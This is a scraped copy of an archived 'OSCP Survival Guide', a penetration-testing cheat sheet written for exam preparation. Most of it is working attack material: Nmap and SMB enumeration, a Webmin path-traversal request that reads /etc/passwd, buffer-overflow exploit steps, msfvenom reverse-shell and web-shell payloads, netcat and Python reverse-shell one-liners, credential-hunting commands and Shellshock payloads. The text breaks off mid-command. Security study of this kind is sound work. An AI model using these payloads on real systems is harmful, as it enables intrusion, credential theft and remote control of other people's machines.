0% found this document useful (0 votes)

27 views

x89k

The OSCP Survival Guide provides a comprehensive overview of tools and techniques for penetration testing, including information gathering, vulnerability scanning, and exploitation methods. It covers various topics such as using Kali Linux, Python scripting, and tools like Nmap and Netcat for network analysis and attacks. The document serves as a practical resource for individuals preparing for the Offensive Security Certified Professional (OSCP) exam.

Uploaded by

Wang Jj

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

27 views

x89k

Uploaded by

Wang Jj

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 33

2025/2/21 下午4:03 x89k

archive.today Saved from https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html search 16 Jan 2019 23:24:58 UTC

webpage capture no other snapshots from this url
All snapshots from host x89k.cf

Webpage Screenshot share download .zip report bug or abuse Buy me a coffee

OSCP survival guide 

NOVEMBER 3RD, 2018

OSCP-Survival-Guide
NOTE: This document refers to the target ip as the export variable $ip.

To set this value on the command line use the following syntax:

X89K export ip=192.168.1.100

Table of Contents
Python, C, Reverse Engineering,
Security

   Kali Linux
Information Gathering & Vulnerability Scanning
Passive Information Gathering
Series: Active Information Gathering
Reverse Engineering Port Scanning
Basics Enumeration
HTTP Enumeration
Malware With Python Buffer Overflows and Exploits
Shells
Projects File Transfers
Privilege Escalation
Contact: Linux Privilege Escalation
[email protected] Windows Privilege Escalation
Github/lduck11007 Client, Web and Password Attacks
Client Attacks
u/x89k
Web Attacks
File Inclusion Vulnerabilities LFI/RFI
Database Vulnerabilities
Password Attacks
Password Hash Attacks
Networking, Pivoting and Tunneling
The Metasploit Framework
Bypassing Antivirus Software

Kali Linux
Set the Target IP Address to the $ip system variable
export ip=192.168.1.100

Find the location of a file

locate sbd.exe

Search through directories in the $PATH environment variable

which sbd

Find a search for a file that contains a specific string in it’s name:
find / -name sbd\*

Show active internet connections

netstat -lntp

Change Password
passwd

Verify a service is running and listening

netstat -antp |grep apache

Start a service
systemctl start ssh

systemctl start apache2

Have a service start at boot

systemctl enable ssh

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 1/33
2025/2/21 下午4:03 x89k
Stop a service
systemctl stop ssh
Unzip a gz file
gunzip access.log.gz

Unzip a tar.gz file

tar -xzvf file.tar.gz

Search command history

history | grep phrase_to_search_for

Download a webpage
wget http://www.cisco.com

Open a webpage
curl http://www.cisco.com

String manipulation

Count number of lines in file

wc -l index.html

Get the start or end of a file

head index.html

tail index.html

Extract all the lines that contain a string

grep "href=" index.html

Cut a string by a delimiter, filter results then sort

grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u

Using Grep and regular expressions and output to a file

cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt

Use a bash loop to find the IP address behind each host

for url in $(cat list.txt); do host $url; done

Collect all the IP Addresses from a log file and sort by frequency
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn

Decoding using Kali

Decode Base64 Encoded Values

echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode

Decode Hexidecimal Encoded Values

echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps

Netcat - Read and write TCP and UDP Packets

Download Netcat for Windows (handy for creating reverse shells and
transfering files on windows
systems):https://joncraton.org/blog/46/netcat-for-windows/

Connect to a POP3 mail server

nc -nv $ip 110

Listen on TCP/UDP port

nc -nlvp 4444

Connect to a netcat port

nc -nv $ip 4444

Send a file using netcat

nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe

Receive a file using netcat

nc -nlvp 4444 > incoming.exe

Some OSs (OpenBSD) will use nc.traditional rather than nc so watch

out for that…

whereis nc
nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz

/bin/nc.traditional -e /bin/bash 1.2.3.4 4444

Create a reverse shell with Ncat using cmd.exe on Windows

nc.exe -nlvp 4444 -e cmd.exe

nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe

Create a reverse shell with Ncat using bash on Linux

nc -nv $ip 4444 -e /bin/bash

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 2/33
2025/2/21 下午4:03 x89k
Netcat for Banner Grabbing:

echo "" | nc -nv -w1 <IP Address> <Ports>

Ncat - Netcat for Nmap project which provides more security avoid IDS

Reverse shell from windows using cmd.exe using ssl

ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl

Listen on port 4444 using ssl

ncat -v $ip 4444 --ssl

Wireshark

Show only SMTP (port 25) and ICMP traffic:

tcp.port eq 25 or icmp

Show only traffic in the LAN (192.168.x.x), between workstations and

servers – no Internet:

ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16

Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:

ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip

Some commands are equal

ip.addr == xxx.xxx.xxx.xxx

Equals

ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx

ip.addr != xxx.xxx.xxx.xxx

Equals

ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx

Tcpdump

Display a pcap file

tcpdump -r passwordz.pcap

Display ips and filter and sort

tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head

Grab a packet capture on port 80

tcpdump tcp port 80 -w output.pcap -i eth0

Check for ACK or PSH flag set in a TCP packet

tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap

IPTables

Deny traffic to ports except for Local Loopback

iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP

iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP

Clear ALL IPTables firewall rules

```bash
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X
iptables -t raw -F iptables -t raw -X
```

Information Gathering &

Vulnerability Scanning
Passive Information Gathering
Google Hacking

Google search to find website sub domains

site:microsoft.com

Google filetype, and intitle

intitle:"netbotz appliance" "OK" -filetype:pdf

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 3/33
2025/2/21 下午4:03 x89k
Google inurl
inurl:"level/15/sexec/-/show"

Google Hacking Database:

https://www.exploit-db.com/google-hacking-database/
SSL Certificate Testing
https://www.ssllabs.com/ssltest/analyze.html

Email Harvesting

Simply Email
git clone https://github.com/killswitch-GUI/SimplyEmail.git

./SimplyEmail.py -all -e TARGET-DOMAIN

Netcraft

Determine the operating system and tools used to build a site

https://searchdns.netcraft.com/
Whois Enumeration
whois domain-name-here.com

whois $ip

Banner Grabbing

nc -v $ip 25

telnet $ip 25

nc TARGET-IP 80

Recon-ng - full-featured web reconnaissance framework written in Python

cd /opt; git clone https://[email protected]/LaNMaSteR53/recon-ng.git

cd /opt/recon-ng

./recon-ng

show modules

help

Active Information Gathering

Port Scanning
Subnet Reference Table

/ Addresses Hosts Netmask Amount of a Class C

/30 4 2 255.255.255.252 1/64
/29 8 6 255.255.255.248 1/32
/28 16 14 255.255.255.240 1/16
/27 32 30 255.255.255.224 1/8
/26 64 62 255.255.255.192 1/4
/25 128 126 255.255.255.128 1/2
/24 256 254 255.255.255.0 1
/23 512 510 255.255.254.0 2
/22 1024 1022 255.255.252.0 4
/21 2048 2046 255.255.248.0 8
/20 4096 4094 255.255.240.0 16
/19 8192 8190 255.255.224.0 32
/18 16384 16382 255.255.192.0 64
/17 32768 32766 255.255.128.0 128
/16 65536 65534 255.255.0.0 256
Set the ip address as a variable
export ip=192.168.1.100 nmap -A -T4 -p- $ip

Netcat port Scanning

nc -nvv -w 1 -z $ip 3388-3390

Discover active IPs usign ARP on the network: arp-scan $ip/24

Discover who else is on the network

netdiscover

Discover IP Mac and Mac vendors from ARP

netdiscover -r $ip/24

Nmap stealth scan using SYN

nmap -sS $ip

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 4/33
2025/2/21 下午4:03 x89k
Nmap stealth scan using FIN
nmap -sF $ip
Nmap Banner Grabbing
nmap -sV -sT $ip

Nmap OS Fingerprinting
nmap -O $ip

Nmap Regular Scan:

nmap $ip/24

Enumeration Scan
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt

Enumeration Scan All Ports TCP / UDP and output to a txt file
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip

Nmap output to a file:

nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24

Quick Scan:
nmap -T4 -F $ip/24

Quick Scan Plus:

nmap -sV -T4 -O -F --version-light $ip/24

Quick traceroute
nmap -sn --traceroute $ip

All TCP and UDP Ports

nmap -v -sU -sS -p- -A -T4 $ip

Intense Scan:
nmap -T4 -A -v $ip

Intense Scan Plus UDP

nmap -sS -sU -T4 -A -v $ip/24

Intense Scan ALL TCP Ports

nmap -p 1-65535 -T4 -A -v $ip/24

Intense Scan - No Ping

nmap -T4 -A -v -Pn $ip/24

Ping scan
nmap -sn $ip/24

Slow Comprehensive Scan

nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (disco

Scan with Active connect in order to weed out any spoofed ports designed to
troll you
nmap -p1-65535 -A -T5 -sT $ip

Enumeration
DNS Enumeration

NMAP DNS Hostnames Lookup

nmap -F --dns-server <dns server ip> <target ip range>

Host Lookup
host -t ns megacorpone.com

Reverse Lookup Brute Force - find domains in the same range

for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

Perform DNS IP Lookup

dig a domain-name-here.com @nameserver

Perform MX Record Lookup

dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG

dig axfr domain-name-here.com @nameserver

DNS Zone Transfers

Windows DNS zone transfer

nslookup -> set type=any -> ls -d blah.com

Linux DNS zone transfer

dig axfr blah.com @ns1.blah.com

Dnsrecon DNS Brute Force

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 5/33
2025/2/21 下午4:03 x89k
Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr
DNSEnum
dnsenum zonetransfer.me
NMap Enumeration Script List:

NMap Discovery
https://nmap.org/nsedoc/categories/discovery.html

Nmap port version detection MAXIMUM power

nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>

NFS (Network File System) Enumeration

Show Mountable NFS Shares nmap -sV --script=nfs-showmount $ip

RPC (Remote Procedure Call) Enumeration

Connect to an RPC share without a username and password and

enumerate privledges
rpcclient --user="" --command=enumprivs -N $ip

Connect to an RPC share with a username and enumerate privledges

rpcclient --user="<Username>" --command=enumprivs $ip

SMB Enumeration

SMB OS Discovery
nmap $ip --script smb-os-discovery.nse

Nmap port scan

nmap -v -p 139,445 -oG smb.txt $ip-254

Netbios Information Scanning

nbtscan -r $ip/24

Nmap find exposed Netbios servers

nmap -sU --script nbstat.nse -p 137 $ip

Nmap all SMB scripts scan

nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external o

Nmap all SMB scripts authenticated scan

nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb

SMB Enumeration Tools

nmblookup -A $ip

smbclient //MOUNT/share -I $ip -N

rpcclient -U "" $ip

enum4linux $ip

enum4linux -a $ip

SMB Finger Printing

smbclient -L //$ip

Nmap Scan for Open SMB Shares

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=pa

Nmap scans for vulnerable SMB Servers

nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip

Nmap List all SMB scripts installed

ls -l /usr/share/nmap/scripts/smb*

Enumerate SMB Users

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14

python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip

RID Cycling - Null Sessions

ridenum.py $ip 500 50000 dict.txt

Manual Null Session Testing

Windows: net use \\$ip\IPC$ "" /u:""

Linux: smbclient -L //$ip

SMTP Enumeration - Mail Severs

Verify SMTP port using Netcat

nc -nv $ip 25

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 6/33
2025/2/21 下午4:03 x89k
POP3 Enumeration - Reading other peoples mail - You may find usernames
and passwords for email accounts, so here is how to check the mail using
Telnet

root@kali:~# telnet $ip 110

+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean

list

+OK 2 1807
1 786
2 1021

retr 1

+OK Message follows

From: [email protected]
Dear Billy Dean,

Here is your login for remote desktop ... try not to forget it
this time!
username: billydean
password: PA$$W0RD!Z

SNMP Enumeration -Simple Network Management Protocol

Fix SNMP output values so they are human readable

apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf

SNMP Enumeration Commands

snmpcheck -t $ip -c public

snmpwalk -c public -v1 $ip 1|

grep hrSWRunName|cut -d\* \* -f

snmpenum -t $ip

onesixtyone -c names -i hosts

SNMPv3 Enumeration
nmap -sV -p 161 --script=snmp-info $ip/24

Automate the username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

SNMP Default Credentials

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

MS SQL Server Enumeration

Nmap Information Gathering

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,m

Webmin and miniserv/0.01 Enumeration - Port 10000

Test for LFI & file disclosure vulnerability by grabbing /etc/passwd

`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%0
1/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%0
1/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%0
1/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%0
1/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`

Test to see if webmin is running as root by grabbing /etc/shadow

Linux OS Enumeration

List all SUID files

find / -perm -4000 2>/dev/null

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 7/33
2025/2/21 下午4:03 x89k
Determine the current version of Linux
cat /etc/issue
Determine more information about the environment
uname -a

List processes running

ps -xaf

List the allowed (and forbidden) commands for the invoking use
sudo -l

List iptables rules

iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t man
Windows OS Enumeration

net config Workstation

systeminfo findstr /B /C:”OS Name” /C:”OS Version”

hostname

net users

ipconfig /all

route print

arp -A

netstat -ano

netsh firewall show state

netsh firewall show config

schtasks /query /fo LIST /v

tasklist /SVC

net start

DRIVERQUERY

reg query
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

dir /s pass == cred == vnc == .config

findstr /si password .xml .ini *.txt

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

Vulnerability Scanning with Nmap

Nmap Exploit Scripts

https://nmap.org/nsedoc/categories/exploit.html

Nmap search through vulnerability scripts

cd /usr/share/nmap/scripts/ ls -l \*vuln\*

Nmap search through Nmap Scripts for a specific keyword

ls /usr/share/nmap/scripts/\* | grep ftp

Scan for vulnerable exploits with nmap

nmap --script exploit -Pn $ip

NMap Auth Scripts

https://nmap.org/nsedoc/categories/auth.html

Nmap Vuln Scanning

https://nmap.org/nsedoc/categories/vuln.html

NMap DOS Scanning

nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script http-

Scan for coldfusion web vulnerabilities

nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip

Anonymous FTP dump with Nmap

nmap -v -p 21 --script=ftp-anon.nse $ip-254

SMB Security mode scan with Nmap

nmap -v -p 21 --script=ftp-anon.nse $ip-254

File Enumeration

Find UID 0 files root execution

/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 8/33
2025/2/21 下午4:03 x89k
Get handy linux file system enumeration script (/var/tmp)
wget https://highon.coffee/downloads/linux-local-enum.sh
chmod +x ./linux-local-enum.sh ./linux-local-enum.sh

Find executable files updated in August

find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -l

Find a specific file on linux

find /. -name suid\*

Find all the strings in a file

strings <filename>

Determine the type of a file

file <filename>

HTTP Enumeration
Search for folders with gobuster:
gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip

OWasp DirBuster - Http folder enumeration - can take a dictionary file

Dirb - Directory brute force finding using a dictionary file

dirb http://$ip/ wordlist.dict dirb <http://vm/>

Dirb against a proxy

dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129

Nikto
nikto -h $ip

HTTP Enumeration with NMAP

nmap --script=http-enum -p80 -n $ip/24

Nmap Check the server methods

nmap --script http-methods --script-args http-methods.url-path='/test' $ip

Get Options available from web server curl -vX OPTIONS vm/test

Uniscan directory finder:

uniscan -qweds -u <http://vm/>

Wfuzz - The web brute forcer

wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test

wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ

Recurse level 3

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ

Open a service using a port knock (Secured with Knockd)

for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x
server_ip_address; done

WordPress Scan - Wordpress security scanner

wpscan –url $ip/blog –proxy $ip:3129

RSH Enumeration - Unencrypted file transfer system

auxiliary/scanner/rservices/rsh_login
Finger Enumeration

finger @$ip

finger batman@$ip

TLS & SSL Testing

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip aha > OUTPUT-FILE.html

Proxy Enumeration (useful for open proxies)

nikto -useproxy http://$ip:3128 -h $ip

Steganography

apt-get install steghide

steghide extract -sf picture.jpg
steghide info picture.jpg
apt-get install stegosuite

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 9/33
2025/2/21 下午4:03 x89k
The OpenVAS Vulnerability Scanner

apt-get update
apt-get install openvas
openvas-setup

netstat -tulpn

Buffer Overflows and Exploits

DEP and ASLR - Data Execution Prevention (DEP) and Address Space
Layout Randomization (ASLR)

Nmap Fuzzers:

NMap Fuzzer List

https://nmap.org/nsedoc/categories/fuzzer.html

NMap HTTP Form Fuzzer

nmap –script http-form-fuzzer –script-args ‘http-form-fuzzer.targets={1=
{path=/},2={path=/register.html}}’ -p 80 $ip

Nmap DNS Fuzzer

nmap –script dns-fuzz –script-args timelimit=2h $ip -d

MSFvenom
https://www.offensive-security.com/metasploit-unleashed/msfvenom/

Windows Buffer Overflows

Controlling EIP

locate pattern_create
pattern_create.rb -l 2700
locate pattern_offset
pattern_offset.rb -q 39694438

Verify exact location of EIP - [*] Exact match at offset 2606

buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90

Check for “Bad Characters” - Run multiple times 0x00 - 0xFF

Use Mona to determine a module that is unprotected

Bypass DEP if present by finding a Memory Location with Read and

Execute access for JMP ESP

Use NASM to determine the HEX code for a JMP ESP instruction

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

JMP ESP
00000000 FFE4 jmp esp

Run Mona in immunity log window to find (FFE4) XEF command

!mona find -s "\xff\xe4" -m slmfc.dll

found at 0x5f4a358f - Flip around for little endian format
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390

MSFVenom to create payload

msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -

f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Final Payload with NOP slide

buffer="A"2606 + "\x8f\x35\x4a\x5f" + "\x90" 8 + shellco

Create a PE Reverse Shell

msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f
exe -o shell_reverse.exe

Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai

msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f
exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 10/33
2025/2/21 下午4:03 x89k
Create a PE reverse shell and embed it into an existing executable
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f
exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe
-o shell_reverse_msf_encoded_embedded.exe
Create a PE Reverse HTTPS shell
msfvenom -p windows/meterpreter/reverse_https LHOST=$ip
LPORT=443 -f exe -o met_https_reverse.exe
Linux Buffer Overflows

Run Evans Debugger against an app

edb –run /usr/games/crossfire/bin/crossfire

ESP register points toward the end of our CBuffer

add eax,12
jmp eax
83C00C add eax,byte +0xc
FFE0 jmp eax

Check for “Bad Characters” Process of elimination - Run multiple times

0x00 - 0xFF

Find JMP ESP address

“\x97\x45\x13\x08” # Found at Address 08134597

crash = “\x41” * 4368 + “\x97\x45\x13\x08” +

“\x83\xc0\x0c\xff\xe0\x90\x90”

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b

“\x00\x0a\x0d\x20” –e x86/shikata_ga_nai

Connect to the shell with netcat:

nc -v $ip 4444

Shells
Netcat Shell Listener

nc -nlvp 4444

Spawning a TTY Shell - Break out of Jail or limited shell You should almost
always upgrade your shell after taking control of an apache or www user.

(For example when you encounter an error message when trying to

run an exploit sh: no job control in this shell )

(hint: sudo -l to see what you can run)

You may encounter limited shells that use rbash and only allow you to
execute a single command per session. You can overcome this by
executing an SSH shell to your localhost:

ssh user@$ip nc $localip 4444 -e /bin/sh

enter user's password
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux

python -c 'import pty; pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(so

cket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",12
34));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fil
eno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'

echo os.system('/bin/bash')

/bin/sh -i

perl —e 'exec "/bin/sh";'

perl: exec "/bin/sh";

ruby: exec "/bin/sh"

lua: os.execute('/bin/sh')

From within IRB: exec "/bin/sh"

From within vi: :!bash or

:set shell=/bin/bash:shell

From within vim ':!bash':

From within nmap: !sh

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 11/33
2025/2/21 下午4:03 x89k
From within tcpdump

echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmo

d +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1
–z /tmp/.tst –Z root

From busybox /bin/busybox telnetd -|/bin/sh -p9999

Pen test monkey PHP reverse shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shel

php-findsock-shell - turns PHP port 80 into an interactive shell

http://pentestmonkey.net/tools/web-shells/php-findsock-shell

Perl Reverse Shell

http://pentestmonkey.net/tools/web-shells/perl-reverse-shell

PHP powered web browser Shell b374k with file upload etc.
https://github.com/b374k/b374k

Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a

Meterpreter
shellhttps://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-
Shellcode.ps1

Web Backdoors from Fuzzdb https://github.com/fuzzdb-

project/fuzzdb/tree/master/web-backdoors

Creating Meterpreter Shells with MSFVenom -

http://www.securityunlocked.com/2016/01/02/network-security-
pentesting/most-useful-msfvenom-payloads/

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Conne

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -

Web Payloads

PHP

msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > sh

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On>

Then we need to add the <?php at the first line of the file so that it will execute
as a PHP webpage:

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On>

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On>

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f ra

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f ra

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid

parameters. Msfvenom will output code that is able to be cut and pasted in
this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Conne

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 12/33
2025/2/21 下午4:03 x89k
Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -

Handlers Metasploit handlers can be great at quickly setting up Metasploit to

be in a position to receive your incoming shells. Handlers should be in the
following format.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Once the required values are completed the following command will execute
your handler – ‘msfconsole -L -r ‘
SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-
meterpreter-try-this/

use auxiliary/scanner/ssh/ssh_login
use post/multi/manage/shell_to_meterpreter

SBD.exe

sbd is a Netcat-clone, designed to be portable and offer strong encryption. It

runs on Unix-like operating systems and on Microsoft Win32. sbd features
AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program
execution (-e option), choosing source port, continuous reconnection with
delay, and some other nice features. sbd supports TCP/IP communication
only. sbd.exe (part of the Kali linux distribution: /usr/share/windows-
binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat
alternative.

Shellshock

Testing for shell shock with NMap

root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin

git clone https://github.com/nccgroup/shocker

./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

Shell Shock SSH Forced Command

Check for forced command by enabling all debug output with ssh

ssh -vvv
ssh -i noob noob@$ip '() { :;}; /bin/bash'

cat file (view file contents)

echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent:

() {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nC
onnection: close\\r\\n\\r\\n" | nc TARGET 80

Shell Shock run bind shell

echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: ()

